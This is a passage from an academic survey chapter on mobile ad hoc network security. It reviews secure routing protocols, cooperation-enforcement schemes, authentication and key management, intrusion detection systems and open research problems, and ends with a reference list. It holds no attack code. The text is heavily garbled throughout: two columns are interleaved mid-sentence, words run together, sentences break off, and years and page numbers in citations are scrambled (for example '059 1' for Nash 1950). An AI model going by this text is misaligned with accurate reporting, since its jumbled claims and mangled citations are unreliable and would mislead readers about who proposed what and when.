plied to DSR. SRP requires a security association fore proposed a statistical approach that eliminates
between the source and destination nodes and uses the need of clock synchronization. An approach
the association to authenticate route request and to defend against rushing attacks has also been
route reply messages. Malicious modifications proposed (Hu et al., 2003).
of the routing messages will be detected at the
destination. SRP does not attempt to secure route cooperation in MAnEts
error messages, therefore the messages are subject
to forgery. Thepresenceofselfishnodesthatdonotrespect
Ariadne was developed by Hu, Johnson, and the routing protocols or MAC protocols can cause
Perrig (2002) based on DSR. Ariadne can authen- performance degradation or even network partition.
ticate routing messages using one of the three This subsection will discuss the approaches that
schemes: shared secret keys between all pairs of have been proposed to solve this problem. Most
nodes, shared secret keys between communicating of these approaches are used at the network layer,
nodes combined with broadcast authentication, but some approaches can also be applied to MAC
or digital signatures. Ariadne uses symmetric layerwithpropermodifications.
cryptography primitives, with TESLA(timed ef-
ficientstreamloss-tolerantauthentication) 1. One of the (Perrig,
approaches is to detect mis-
Canetti, Song, & Tygar, 2001; Perrig, Canetti, Tygar, behaving nodes and then avoid such nodes in
& Song, 2002), a broadcast authentication scheme routing.
that requires time synchronization. Some research- Marti Giuli, Lai, and Baker (2000) propose
ers argue time synchronization is an unrealistic two techniques, watchdog and pathrater, to detect
requirement for ad hoc networks. the presence of nodes that have agreed to forward
Hu, Perrig, and Johnson (2002) designed a packets but fail to do so. The watchdog, run by
secureefficientadhocdistancevector - routing
each node on apropath, can identify the misbehaving
tocol (SEAD) for DSDV to prevent from attacks of node by monitoring the next hop to ensure that
DoS, replay attacks, and wormhole attacks. SEAD the packets are timely passed on. Although it can
also uses hash chains to authenticate metric and detect misbehaviors at the forwarding level, the
sequence numbers. SEAD does not use asymmetric watchdog might not be able to detect in the pres-
cryptography operations thus the authentication ence of collisions, colluding attacks, and partial
overhead is maintained at a reasonable level. dropping. The pathrater can help to avoid the mis-
Zapata (2006) proposed secure AODV (SA- behaving nodes. Each node maintains a rating for
ODV). SAODV is a secure extension of the AODV every other node in the network. The rating will
routing protocol that can be used to protect the be incremented if the node is on an actively used
0
path, and decremented on a broken path. A node observations and reports by other nodes. It applies
calculates a path metric by averaging the node different weights to subjective reputation (obser-
ratings in the path. vations), indirect reputation (positive reputation
reported by others), and functional reputation
2. Another approach is to design protocols (the subjective and indirect reputation calculated
that stimulate cooperation by penalizing mis- with respect to different functions). At each node,
behavior or rewarding behavior of forwarding reputation values are stored in a reputation table,
for other nodes’ benefit. and a watchdog mechanism is used to detect mis-
Buttyan and Hubaux (2000, 2003) propose a behaving nodes.
protocol that can stimulate packet forwarding. It Sprite is a cheat-proof and credit-based system
requires a node to pass all packets to its security (Zhong, Chen, & Yang, 2003), which also requires
module, which maintains a counter called nuglet that nodes receive enough credits by forwarding
counter. The counter is decreased whenever the for other nodes to send their own packets. To prove
node sends a packet as the originator, and increased a node has received or forwarded a message, the
when the node forwards a packet for another node. node keeps a receipt of the message and uploads
Since the value of the counter must remain positive, the receipt to a credit clearance service (CCS).
a node needs to maintain a balance on the counter To motivate nodes to report receipts, CCS gives
byforwardingpacketsforthebenefitsofmore others
creditstoto a node that forwards a message
have its own packets to be sent. To prevent a node than to a node that does not. Proper actions are
from illegitimately increasing its own counter, the taken to prevent the cheating action. If a message
counter is required to be maintained by a trusted is not received by the destination, the credits to the
and tamper resistant hardware module (such as a intermediate nodes will be greatly reduced, and
Smart card). thereforethebenefitoffalselyreportingarecei
CONFIDANT (cooperation of nodes fairness in by an intermediate node will be reduced too. The
dynamic ad-hoc networks) (Buchegger & Boudec, approach needs a centralized trusted entity, which
2001, 2002a, 2002b) was proposed to detect, dis- is hard for MANETs.
courage and stop selfish misbehaviors. - CONFI
Some other interesting approaches that use
DANT consists of four components: a monitor to punishment or rewarding systems can be found
observe the neighborhood; a trust manager to deal by Mohan and Joiner (2004) and Salem, Buttyan,
with incoming and outgoing warning messages; a Hubaux, and Jakobsson (2003).
reputation system to maintain reputation records
based on own experiences, vicinity observations, 3. Game-theoretic techniques (Jones, 2000)
and reported records; and a path manager for nodes have also been used to develop protocols for
to adapt their behavior according to the reputa- stimulating cooperation (Anderegg & Eiden-
tion of a node or a path. CONFIDANT takes into benz, 2003; Srinivasan, Nuggehalli, Chiasserini,
consideration the problem of nodes providing false & Rao, 2003).
information to gain good reputation. With a proper These techniques assume that all nodes are self-
weightsystemandamodifiedBayesianestimation ish and rational, that is, they only do things that
procedure, the second-hand information can still are beneficial to themselves and their purpose
speed up the detection while suppressing false to maximize their own utility. Usually noncoop-
positives and negatives. The simulation results erative game model is used in these approaches.
show that the network performance can still be By means of imposing suitable costs on network
good even when half of the network population operation, the game reaches a stable state called
misbehaves. “Nashequilibrium”( Nash,where , ) 059 1 aselfish
CORE is a collaborative reputation mecha- node cannot gain an advantage over well-behaved
nism (Michiardi & Molva, 2002a). Similarly to nodes.
CONFIDANT, CORE also differentiates between

Anderegg and Eidenbenz (2003) provide a game prevent a malicious node from tampering a node
theoretic approach, which goal is to achieve truth- that has delays in receiving the newest key, by
fulness and cost-efficiency for routingmeans protocols
of using the newest key to forge packets
in MANETs. The approach pays the forwarding with valid authentication information. Authentica-
nodes a premium over their actual costs for for- tion techniques that use one-way hash chain keys
warding data packets. The authors show that the can tolerate packet loss and have the advantage of
total overpayment is relatively small. low overhead. TESLA has been adopted by many
Although protocols developed with game-theo- approaches to authenticate neighboring commu-
retic techniques may be resilient to misbehavior, nications in MANETs.
they may not achieve the same performance of Zhu, Xu, Setia, and Jajodia (2003) propose a
protocols developed under the assumption that all light-weight hop-by-hop authentication protocol
nodes are well-behaved. (LHAP), in which every node authenticates all the
packets received from neighbors before forward-
Authentication and key Management ing it. LHAP also uses one-way hash chain, like
in MAnEts TESLA, but it does not use delayed key disclosure.
LHAP uses TRAFFIC chain (a one-way hash chain)
Authentication and key management are essential to authenticate packets, and uses TESLA chain to
problems for MANET security. authenticate TRAFFIC keys. Security properties
and performance is analyzed. The analysis shows
Authentication in MANETs that LHAP is lightweight and practical.
Up to date, a number of authentication protocols Key Management in MANETs

have been proposed for MANETs (Balfanz, Smet-
ters, Stewart, & Wong, 2002; Lu & Pooch, 2005; Key management is an essential cryptographic
Perrig, Canetti, Tygar, & Song, 2000; Venkatra- primitive that is the basis of the other security
man & Agrawal, 2000; Weimerskirch & Thonet, primitives. In the traditional wired networks, cen-
2001). tralized key management approaches are usually
Stajano and Anderson (1999) propose an ap- used. However, an ad hoc network is peer-to-peer
proach for ad hoc network of wireless devices: and does not have a central administration point. In
secure transient association. The purpose of the addition, a central authority may become a single
approach is to provide transient association between point of failures in case of heavy workload, as well
the controller and the peripheral, which is essential as an easy target of malicious attacks. Therefore,
for ad hoc authentication. The idea came from the recent research has been focused on looking for key
biology fact that a duckling emerging from its egg managementapproachesthatarenotonlyefficient
will recognize the first moving object butit sees
also well as
functional on a dynamic network
its mother. Similarly, the approach defines that a topology, and tolerant to link failures.
devicewillrecognizethefirstentitythatsendsita fully distributed certificate a
A partially or
secret key as its owner. As soon as this ownership thority is commonly used for key management in
has been established, the relationship will last for MANETs.
the rest of the nodes’ life. Zhou and Haas (1999) propose a fully distrib-
Perrig et al. (2001, 2002) propose a broadcast uted public-key management service for ad hoc
authentication scheme, TESLA, which uses a one- networks. It is assumed that the communication
way key chain with delayed key disclosure. TESLA channels are reliable, and all nodes in the system
first bootstraps an authentic key from know the
a one- waypublic key and trust any certificates
key chain between the sender and its receivers, signed using the corresponding private key. A
and then broadcasts authentications with delayed (n,t+ 1) threshold cryptography scheme is used
key disclosure. The delayed key disclosure can

for distribution of the private key, where the key However, Chan (2004) argues that although
is divided into n shares. Therefore, n parties are some protocols are fully distributed and self-or-
allowed to share the ability to perform a crypto- ganized without needing any trusted third party
graphic operation (e.g., creating a digital signature), (TTP), they are not robust to dynamic topology
and any t + 1 parties can perform the operation or sporadic links because they need the routing
jointly.Tosignacertificate,eachserver produces
structure that has been established initially.
apartialsignatureforthecertificateChan using itsproposes
(2004) sharea distributed symmetric
and submits the partial signature to a combiner key management scheme for MANETs, which uses
that can generate the entire signature. In this way, a fully distributed and self-organized key pre-dis-
the system can tolerate a certain number (t < n) of tribution scheme (DKPS) without relying on TTPs
compromised servers. or infrastructure support. The DKPS scheme has
A similar approach proposed by Kong, Zer- three phases, namely distributed key selection
fos, Luo, Lu, and Zhang (2001) provide a more (DKS), secure shared-key discovery (SSD), and
fair distribution by allowing each node to carry key exclusion property testing (KEPT). In the
a secret share. Any t + 1 nodes in the vicinity of DKS phase, each node randomly picks keys from
the requesting node can jointly provide complete the publicly known universal set to form its key
service, which increases availability and scalability ring, in which exclusion property will be ensured
of the service. However, this scheme is not secure to avoid collision. As soon as each node shares a
if an attacker can compromise arbitary t + 1 nodes common key with any other node, it enters the
and thus can collect enough shares and reconstruct SSD phase and broadcasts its key identifiers to
the system’s private key. others. To guarantee that the nodes can let each
According to Zhou and Haas (1999) and Kong other know which keys they are having in common
et al. (2001), a trusted authority is needed for without revealing the keys to others, the author
initialization of t + ,the
1 which is difficult proposes MRS modified
first ( Rivest’s scheme) and
in MANETs. In addition, it is still not clear how built SSD upon MRS. MRS is based on the work
to determine the number t initially and adapt t of Rivest, Adleman, and Dertouzos (1978), and is
based on n. a special class of encryption functions that allow
Capkun, Buttyan, and Hubaux (2003) propose operations on the encrypted data without needing
a fully self-organized public-key management knowledge of the decryption functions. In KEPT
system that does not require use of any trusted phase, a node tests whether its set of keys satisfy
authority even in the system initialization phase. the exclusion property.
Like PGP (pretty good privacy)(Zimmermann, CrepeauandDavisprovide ) 30 2 ( acertificate
1995), the scheme allows a node to create public and revocation scheme that can defend against attacks
privatekeysbyitself.Butthekeysandof certificates
maliciously accusing other nodes and using
are not stored in centralized certificate - revoked certificatetoaccessnetworkservices
reposito
ries. Instead, they can be stored at the nodes in a Many researchers are still making efforts to
fully distributed manner. When a node wants to find a secure yet cost-efficient key distribution
obtain the public key of another node, it acquires approach.
a chain of valid public-key certificates. The first
certificateofthechaincanbedirectly verified
Intrusion by
detection systems (Ids) for
using a trusted public key. Then each sequential MAnEts
certificate can be verified using the public key
containedinthepreviouscertificate ofthe
In the chain.
traditional Internet, network devices such
Thelastcertificatecontainsthepublic keyof
as routers, the and gateways can be used
switches,
target user. The system allows the nodes in the to monitor the traffic. Due to the lack of these
network to perform key authentication based only networkdevicesandafixedinfrastructure,intr
on their local information. sion detection in MANETs is more challenging

than that in the Internet. Moreover, the restriction agents; a local response module that triggers lo-
of resources again brings more difficulty cal to data
response actions; a global response module
analysis, which usually plays an important role that coordinates responses among neighboring
in intrusion detection. A comprehensive survey nodes; and a secure communication module that
on IDS for MANETs can be found by Avantvalee provides secure communication channels among
and Wu (2006). IDS agents. On the anomaly detection model,
An IDS for MANETs not only has the same two classification techniques, RIPPER(repeated
requirements as in the wired networks (such as incremental prunig to produce error reduction) and
reliability, minimal false positive and false nega- SVM (support vector machine) light, are applied
tive rates, transparency to system and users, etc.), to compute classifiers as anomaly detectors. The
but also requires low usage of system and network classifiers are used to detect anomaly updates
resources. Therefore, the design and development routing tables. The performances are evaluated and
of IDS for MANETs is not a trivial task. compared through simulations. The authors find
A simple solution for IDS in MANETs is that thatprotocolswithstrongtrafficcorrelation
each host relies on itself for detection, where the to have better detection performance.
audit data are gathered and processed locally. Some Kachirski and Guha (2003) propose an agent-
IDS proposed for MANETs use this solution of based IDS that uses multiple mobile sensors to de-
letting individual nodes to determine intrusions termine intrusions. The system assigns functional
independently in case the local evidence is strong. tasks different agents: a network monitoring agent
But many systems also allow a node to request to monitor network packets (only on certain nodes
complementary information from others so that to preserve resources); a host monitoring agent on
cooperation can be reinforced in case of weak or every node to monitor system and applications
inconclusive local evidence. level activities; a decision-making agent on every
Albers, Camp, Percher, Jouga, Me, and Puttini node to determine intrusions based on host-level
(2002) propose a local IDS (LIDS), which uses information, and on certain nodes to determine
several mobile agents on each node. All the LIDS network-level intrusions; and an action agent on
in a community can collaborate to alert each other every node to respond to intrusions. Similarly to
of intrusions. These data are independent from the two IDS described above, this system makes
operating system and need no additional resources intrusion decisions based on both independent and
for local information. A LIDS has several data collaborative monitoring, and the level of the moni-
collecting agents of different types: a local agent toring can be adapted according to the availability
that locally detects intrusions and responds to intru- of the computational and network resources.
sions; a collection of mobile agents that collect and Another intrusion detection technique is the dy-
process data from remote hosts; and a local MIB namic hierarchical intrusion detection architecture
agent that collects MIB (management information proposed by Sterne, Balasubramanyam, Carman,
base) variables for the mobile agents or the local Wilson, Talpade, Ko et al. (2005). The system
LIDS agent. The implementation of prototypes requires every node to monitor, log, analyze, and
was claimed by the authors, but the results are not respond to detected intrusions. It also uses clus-
demonstrated in the publication. tering to form a hierarchical structure. Different
A distributed intrusion detection model was nodes (e.g., leaf nodes and clusterhead nodes in
later proposed by Zhang, Lee, and Huang (2003). the structure) may perform different functions in
The model of the IDS agent is composed of six intrusion detections. This hierarchical structure
modules: a local data collection module that isadvantageousinmonitoringend-to-endtraffic
collects real-time audit data; a local detection and thus can help detect end-to-end attacks. The
engine that performs local anomaly detection; a system does not use promiscuous listening, which
cooperative detection engine that helps collabo- is arguably unrealistic for MANETs. However,
ration and collects broader data sets from other some researchers have also argued that a hierarchi-

cal architecture may not be suitable to MANETs information or evidence provided by peers, not
either, due to the rapid topology change of MANETs by trusted authorities or a central administration
and the high overhead introduced by organizing point (as in the Internet or wireless networks with
the hierarchy. base-stations). Additionally, the gathering of the
Sun, Wu, and Pooch (2003) propose a zone- trust evidence may be difficult due to the small
based IDS (ZBIDS). ZBIDS divides the network bandwidth, and therefore local information has to
into nonoverlapping zones. The nodes are cat- be relied on. Evaluation with uncertain and incom-
egorized into two types based on their locations plete trust evidence certainly poses challenges to
to a zone: intrazone nodes (within a zone and not trust management.
connected to nodes in another zone) and interzone Research progress has been made on au-
nodes (within a zone and connected to nodes in thentication and key management. But finding
another zone). Intrazone nodes are responsible cryptographic mechanisms that consume less
for local detection and broadcast in case of alerts. computational resources and impose lower time
Interzone nodes perform aggregation and correla- complexity is still a major research concern in
tion of these local detection results. The system can MANET security.
limit the detection cooperation in a zone, which AnotherproblemforMANETsecurityistofind
may reduce the overhead by the broadcast and ag- an effective and efficient approach intrusion for
gregation. However, the system requires that each response. Many publications simply mentioned
node know its physical location, which needs prior that proper actions should be taken to react to
design setup. The management of zones is not a intrusions, which may include alarming the other
trivial task either. nodes in the network, isolating the compromised
Intrusion detection has been a challenging task nodes, or re-establishing the trust relationship for
for MANETs, mainly due to the distribution na- the entire network. But the problem of how to locate
ture and resource constraints of ad hoc networks. and then isolate the compromised nodes is not dis-
To determine intrusions with local or incomplete cussed in details. The location and isolation could
information and with low overhead has been a be even more difficult when distributed attack
major concern for researchers. are launched from multiple sources. Eliminating
the compromised nodes by rekeying or rebuilding
the trust could be an effective solution. However,
oPEn cHAllEngEs And it is certainly not efficient taking into accou
conclusIon the computation and communication overhead it
may cause.
Some other unexplored research problems in-
challenges
clude the tradeoff between privacy (such as identity
anonymity and location privacy) and other security
The research in MANET security is still in its early
services (such as accounting and intrusion detec-
stage. Some areas that are interesting but little
tion), and the tradeoff between security strengths
explored include accounting, trust management,
and network performance.
authentication, and key management.
Yang et al. (2004) argue that MANET security
Accounting provides the method for collecting
needs a “multifence security solution,” namely re-
the information used for billing, auditing, and
siliency-oriented security design. They argue that
reporting. Accounting mechanisms can track the
the existing proposals are attack-oriented because
services that users are accessing as well as the
theprotocolstargetsomespecificattackthat
amount of network resources they are consuming.
beenidentifiedfirst.Theseprotocolsthereforema
Accounting is a challenging problem due to the
not work well in the presence of unanticipated
distributed and ephemeral nature of MANETs.
attacks. They propose that a security solution is
The characteristics of MANETs also bring
needed that can be embedded into every component
difficulty trust
to management. In MANETs,
or every layer in the network. The solution can
the trustworthiness is evaluated based on the

offer multiple lines of defense against many both International Workshop on Wireless Information
known and unknown security threats. Systems (WIS-2002) (pp. 1-12).
Besides problems described above, how to adapt
Anderegg, L., & Eidenbenz, S. (2003). Routing
the security mechanisms in a large-scale wireless
and forwarding: Ad hoc-VCG: A truthful and
network is also an interesting problem. The scal-
cost-efficient routing protocol for mobile ad hoc
ability of security mechanisms and the compro-
networks with selfish s. Inagent
Proceedings of
mise between security and network scalability
the th
9 Annual International Conference on Mobile
are certainly topics worth further research study.
Computing and Networking MobiCom ( San, ) 50
Diego, (pp. 245-259). ACM Press.
conclusion
Avantvalee, T., & Wu, J. (2006). A survey on in-
With the rapid proliferation of wireless networks trusion detection in mobile ad hoc networks. In Y.
and mobile computing applications, MANETs Xiao, X. Shen, & D. -Z. Du (Eds.), Wireless/mobile
have received increased attention. Security is an network security (pp. 170-196).
important feature for ad hoc networks, especially
Balfanz, D., Smetters, D.K., Stewart, P., & Wong,
inuntrustworthyenvironmentssuchasbattlefields.
H.C. (2002). Talking to strangers: Authentication in
Development of security solutions for ad hoc
ad-hoc wireless networks. Paper presented at the
networks has therefore become a major research
Symposium on Network and Distributed Systems
concern.
Security (NDSS ‘02), San Diego.
However, the characteristics of ad hoc networks
have not only introduced vulnerabilities to mali- Buchegger, S., & Boudec, J.L. (2001). Theselfish
cious attacks varying from passive eavesdropping node: Increasing routing security in mobile ad hoc
to active interfering, but also imposed networks difficulty
(IBM Research Report: RR 3354).
and challenges in introducing security features
to MANETs. Buchegger, S., & Boudec, J.L. (2002a) Nodes
This book chapter has discussed the security bearing grudges: Towards routing security, fair-
vulnerabilities, challenges, and security solu- ness, and robustness in mobile ad hoc networks. In
tions for MANETs. A variety of attacks and their Proceedings of the Tenth Euromicro Workshop on
countermeasureshavebeenidentified Parallel,
fordifferent Distributed and Network-based Process-
network operations, mechanisms, and network lay- ing, Canary Islands, Spain, (pp. 403-410). IEEE
ers. Existing research efforts as well as the open Computer Society.
challenges were discussed in the chapter. Buchegger, S., & Boudec, J.L. (2002b). Performance
analysis of the CONFIDANT protocol: Cooperation
of nodes - fairness in dynamic ad-hoc networks. In
rEfErEncEs Proceedings of IEEE/ACM Symposium on Mobile
Ad Hoc Networking and Computing (MobiHoc),
Lausanne, CH, (pp. 226-236). ACM Press.
Aad, I., Hubaux, J.-P., & Knightly, E.W. (2004).
Denial of service resilience in ad hoc networks. In Buttyán, L., & Hubaux, J.P.- .)02 ( Enforcing
Proceedings of the ACM International Conference service availability in mobile ad-hoc WANs.
on Mobile Computing and Networking (MobiCom In Proceedings of Workshop on Mobile Ad-hoc
2004), Philadelphia, (pp. 202-215). networking and Computing (MobiHOC), Boston,
(pp.. )69- 78
Albers, P., Camp, O., Percher, J., Jouga, B., Me, L.,
& Puttini, R. (2002). Security in ad hoc networks: A Buttyán, L., & Hubaux, J.P.- .)Stimulating
30 2 (
general intrusion detection architecture enhancing cooperation in self-organizing mobile ad hoc
trust based approaches. In Proceedings of the 1st networks. Mobile Networks and Applications,
8(5), 579-592.

Cagalj, M., Ganeriwal, S., Aad, I., & Hubaux, J.-P. Hu, Y.C., Perrig, A., & Johnson, D. (2003b). Rush-
(2004). On cheating in CSMA/CA ad hoc networks ing attacks and defense in wireless ad hoc network
(Tech. Rep. IC/2004/27, EPFL-DI-ICA). Lausanne, routing protocols. In Proceedings of ACM WiSe
Switzerland: Swiss Federal Institute of Technol- 2003, San Diego, (pp. 30-40). ACM Press.
ogy Lausanne.
IEEE. (1999). Standard for wireless LAN-medium
Capkun, S., Buttyan, L., & Hubaux, J.-P. (2003). access control and physical layer specification,
Self-organized public-key management for mobile P802.11.
ad hoc networks. IEEE Transactions on Mobile
Jha, S., Tan, K., & Maxion, R. (2001). Markov
Computing, 2(1), 52-64.
chains, classifiers, and intrusion detection. I
Chan, A.C.-F. (2004). Distributed symmetric Proceedings of the 14th IEEE Computer Security
key management for mobile ad hoc networks. In Foundations Workshop, Cape Breton, Nova Scotia,
Proceedings of the 23rd Annual Joint Confer- Canada, (pp. 206-219).
ence of the IEEE Computer and Communications
Johnson, D.B., Maltz, D.A., & Hu, Y. (2004). The
Societies (INFOCOM), Hong Kong, China, (pp.
dynamic source routing protocol for mobile ad hoc
2414-2424). IEEE.
networks (DSR). INTERNET DRAFT, MANET
Crepeau,C.,&Davis,C.R..A) 302 ( certificate working group. Retrieved November 17th, 2006,
revocation scheme for wireless ad hoc networks. from http://www.ietf.org/internet-drafts/draft-ietf-
In Proceedings of the 1st ACM Workshop Security manet-dsr-10.txt
of Ad Hoc and Sensor Networks, Fairfax, Virginia,
Jones, A. (2000). Game theory: Mathematical
models of conflict(pp. 210-236). Horwood Pub-
Gupta, V., Krishnamurthy, S., & Faloutsos, M. lishing.
(2002). Denial of service attacks at the MAC layer
Kachirski, O., & Guha, R. (2003). Effective intru-
in wireless ad hoc networks. In Proceedings of
sion detection using multiple sensors in wireless ad
MILCOM.
hoc networks. In Proceedingsofthe6th 3 Annual
Hu, Y.C., Johnson, D., & Perrig, A. (2002). SEAD: Hawaii International Conference on System Sci-
Secureefficientdistancevectorrouting encesfor mobile(pp. 57.1-57.8). IEEE.
(HICSS’03)
Kong, J., Zerfos, P., Luo, H., Lu, S., & Zhang, L.
4th IEEE Workshop on Mobile Computing Systems
(2001). Providing robust and ubiquitous security
and Applications (WMCSA ’02), Callicoon, New
support for mobile ad hoc networks. In Proceedings
York, (pp. 3-13).
of the th9 International Conference on Network
Hu, Y.C., Perrig, A., & Johnson, D. (2002). Ari- Protocols (ICNP) (pp. 251 - 260). ACM Press.
adne: A secure on-demand routing protocol for
Konorski, J. (2001). Protection of fairness for
ad hoc networks. In Proceedings of the 8th ACM
multimedia traffic streams in a non-cooperative
International Conference on Mobile Computing
wireless LAN setting. Paper presented at PROMS
and Networking (MobiCom), Atlanta, Georgia,
(LNCS 2213, pp. 116-129). Springer.
Konorski, J. (2002). Multiple access in ad-hoc wire-
Hu, Y.C., Perrig, A., & Johnson, D. (2003a). Packet
less LANs with noncooperative stations. Network-
leashes: A defense against wormhole attacks in
ing (LNCS 2345, pp. 1141-1146). Springer.
Twenty-Second Annual Joint Conference of the Kyasanur, P., & Vaidya, N.H. 20.5)( Selfish
IEEE Computer and Communications Societies MAC layer misbehavior in wireless networks.
(INFOCOM 2003) (pp. 1976-1986). IEEE. IEEE Transactions on Mobile Computing, 4(5),
502-516.

Lu, B., & Pooch, U.W. (2005). A lightweight au- Distributed Systems Modeling and Simulation
thentication protocol for mobile ad hoc networks. Conference (CNDS 2002), San Antonio, TX.
In Proceedings of the International Conference
Perkins, C.E. (Ed.). (2001). Ad hoc networks. Upper
on Information Technology: Coding and Comput-
Saddle River, NJ: Addison-Wesley.
ing (ITCC’0, ) 5 Las Vegas, (pp. 546-551). ACM
Press. Perkins, C.E., Belding-Royer, E.M., & Das, S.R.
(2003). Ad hoc on-demand distance vector (AODV)
Mackenzie, A.B., & Wicker, S.B. (2000). Game
routing. InternetrequestforcommentsRFC. 1 6 5 3
theory and the design of self-configuring, - adap
Retrieved November 17th, 2006, from http://www.
tive wireless networks. IEEE Communications
ietf.org/rfc/rfc3561.txt.
Magazine,93 (11), 126-131.
Perkins, C.E., & Bhagwat, P. (1994). Highly dynam-
Mackenzie, A.B., & Wicker, S.B. (2003). Stability
ic destination-sequenced distance-vector routing
ofmultipacketslottedalohawithselfishusersand
(DSDV)formobilecomputers. Paper presented at
perfect information. In Proceedings of Infocom
the ACM Conference on Communications Architec-
2003, San Francisco, (pp. 1583 -1590). IEEE.
tures, Protocols and Applications (SIGCOMM ‘94)
Macker, J., & Chakeres, I. (2006). Mobile ad-hoc London, (pp. 234-244). ACM Press.
networks (MANET). Retrieved November 17th,
Perrig, A., Canetti, R., Song, D., & Tygar, D.
2006, from http://www.ietf.org/html.charters/ma-
Efficient
. ) 1 02 ( andsecuresourceauthentication
net-charter.html
for multicast. In Proceedings of Network and Dis-
Marti, S., Giuli, T., Lai, K., & Baker, M. (2000). tributed System Security Symposium (NDSS’01),
Mitigating routing misbehavior in mobile ad hoc San Diego, CA, (pp. 35-46).
networks. In Proceedings of the 6th ACM-Inter
Perrig, A., Canetti, R., Tygar, D., & Song, D. (2000)
national Conference on Mobile Computing and
Efficient authentication and signing of multicas
Networking MobiHoc’0
( , ) 5Urbana Champaign,
IL, (pp. 255- 265). ACM Press.
IEEE Symposium on Security and Privacy, Berke-
Michiardi, P., & Molva, R. (2002a). CORE: A ley, CA, (pp. 56-73). IEEE
collaborative reputation mechanism to enforce
Perrig, A., Canetti, R., Tygar, D., & Song, D. (2002,
node cooperation in mobile ad hoc networks.
Summer). The TESLA broadcast authentication
Paper presented at the Sixth IFIP Conference on
protocol. RSACryptoBytes, 5
, 2-13.
Security Communications, and Multimedia (CMS
2002), Portoroz, Slovenia. Radosavac, S., Baras, J.S., & Koutsopoulos, I.
(2005). A framework for MAC protocol misbehav-
Michiardi, P., & Molva, R. (2002b). Game theoretic
ior detection in wireless networks. Paper presented
analysis of security in mobile ad hoc networks
at the Wireless Security Workshop (WiSe ‘05),
(Tech. Rep. RR-02-070). Institut Eurecom.
Cologne, Germany, (pp. 33-42).
Mohan, M., & Joiner, L.L. (2004). Solving bill-
Radosavac, S., Cardenas, A., Baras, J.S., &
ing issues in ad hoc networks. In Proceedings of
Moustakides, G. (2006). Detecting IEEE 802.11
ACMSE ’04, Huntsville, AL, (pp. 31-36). ACM
MAC layer misbehavior in ad hoc networks: Ro-
Press.
bust strategies against individual and colluding
Nash, J. (1950). The bargaining problem. Econo- attacker. Journal of Computer Security: Special
metrica, 18, 155-162. The Econometric Society. Issue on Security of Ad Hoc and Sensor Networks
5 1 (2007), 103-128.
Papadimitratos, P., & Haas, Z.J. (2002). Secure
routing for mobile ad hoc networks. Paper pre- Raya, M., Hubaux, J.-P., & Aad, I. (2004). DOM-
sented at the SCS Communication Networks and INO: A system to detect greedy behavior in IEEE

802.11hotspots. In Proceedings of the Second (WiSe ) 30‘ in conjunction with the th 9 Annual
International Conference on Mobile Systems, Ap- International Conference on Mobile Computing
plications, and Services (MobiSys ‘04), Boston, and Networking (MobiCom ‘03), San Diego, (pp.
MA, (pp. 84-97). 69-78). ACM Press.
Rivest, R.L., Adleman, L., & Dertouzos, M.L. Venkatraman, L., & Agrawal, D. (2000). A novel
(1978). On data banks and privacy homomorphisms authentication scheme for ad hoc networks. Paper
(pp. 169-179). Foundations of secure computation. presented at the IEEE Wireless Communications
Academic Press. and Networking Conference (WCNC 2000), Chi-
cago, IL, (Vol. 3, pp. 1268-1273). IEEE.
Salem, N.B., Buttyan, L., Hubaux, J.-P., & Ja-
kobsson, M. (2003). A charging and rewarding Weimerskirch, A., & Thonet, G. (2001). A distrib-
scheme for packet forwarding in multi-hop cel- uted light-weight authentication model for ad-hoc
lular networks. In Proceedings of MobiHoc’03, networks. In Proceedings of 4th International
Annapolis, MD, (pp. 13-24). ACM Press. Conference on Information Security and Cryp-
tology (ICISC 2001), Seoul, Korea, (pp. 341-354).
Sanzgiri, K., Dahill, B., Levine, B.N., Shields, C.,
ACM Press.
& Royer, E.M. (2002). A secure routing protocol for
ad hoc networks. In Proceedings of the 10th IEEE Xu, W., Trappe, W., Zhang, Y., & Wood, T. (2005).
International Conference on Network Protocols The feasibility of launching and detecting jamming
(ICNP’02), Paris, (pp. 78-87). IEEE. attacks in wireless networks. In Proceedings of the
Sixth ACM International Symposium on Mobile Ad
Song, N., Qian, L., & Li, X. .)052 ( Wormhole
HocNetworkingandComputingMobiHoc ( , ) 5 0‘
attacks detection in wireless ad hoc networks: A
Urbana Champaign, IL, (pp. 48-57). ACM Press.
statistical analysis approach. In Proceedings of
th
91 IEEEInternationalParallelandDistributed Yang, H., Luo, H., Ye, F., Lu, S., & Zhang, L. (2004).
ProcessingSymposium(IPDPS, ) 50‘ Denver, CO, Security in mobile ad hoc networks: Challenges
(pp. 289-296). and solutions. IEEE Wireless Communications,
11(1), 38-47.
Srinivasan, V., Nuggehalli, P., Chiasserini, C.F., &
Rao, R.R. (2003). Cooperation in wireless ad hoc Zapata, M.G. (2006). Secure ad hoc on-demand
networks. In Proceedings of IEEE INFOCOM, distance vector (SAODV) routing. INTERNET
San Francisco, (pp. 808-817). DRAFT, MANET working group. Retrieved De-
cember 12th, 2006, from http://www.ietf.org/inter-
Stajano, F., & Anderson, R.J. (1999). The resur-
net-drafts/draft-guerrero-manet-saodv-06.txt.
recting duckling: Security issues for ad-hoc wire-
less networks. In B. Christiano, B. Crispo, & M. Zhang, Y., Lee, W., & Huang, Y. (2003). Intrusion
Roe (Eds.), Security Protocols, 7th International detection techniques for mobile wireless networks.
Workshop Proceedings (LNCS, vol. 1796, pp. Wireless Networks JournalACM ( WINET)
(5),, 9
172-194). 545-556. ACM/Kluwer Press.
Sterne, D., Balasubramanyam, P., Carman, D., Zhong, S., Chen, J., & Yang, Y.R. (2003). Sprite: A
Wilson, B., Talpade, R., Ko, C., et al. (2005). A simple, cheat-proof, credit-based system for mobile
general cooperative intrusion detection architec- ad-hoc networks. In Proceedings of IEEE Infocom,
ture for MANETs. In Proceedings of the 3rd IEEE San Francisco, (pp. 1987-1997). IEEE.
International Workshop on Information Assurance
Zhou, L., & Haas, Z. (1999). Securing ad hoc
(IWIA, ) 50‘ Oahu, HI, (pp. 57-70).
networks. IEEENetwork,6 (13), 24-30.
Sun, B., Wu, K., & Pooch, U.W. (2003). Alert aggre-
Zhu, S., Xu, S., Setia, S., & Jajodia, S. (2003).
gation in mobile ad hoc networks. In Proceedings
LHAP: A lightweight hop-by-hop authentication
of the 2003 ACM Workshop on Wireless Security

protocol for ad-hoc networks. In Proceedings of MANET (mobile ad hoc network): An infra-
23rd International Conference on Distributed structure-less, self-organizing network of mobile
Computing Systems Workshops (ICDCSW ‘03), hosts connected with wireless communication
Providence, RI, (pp. 749-755). IEEE. channels.AMANETdoesnothaveafixedtopology
because all the hosts can move freely, which results
Zimmermann, P. (1995). The official PGP user’s
in rapid and unpredictable topology change.
guide. MIT Press.
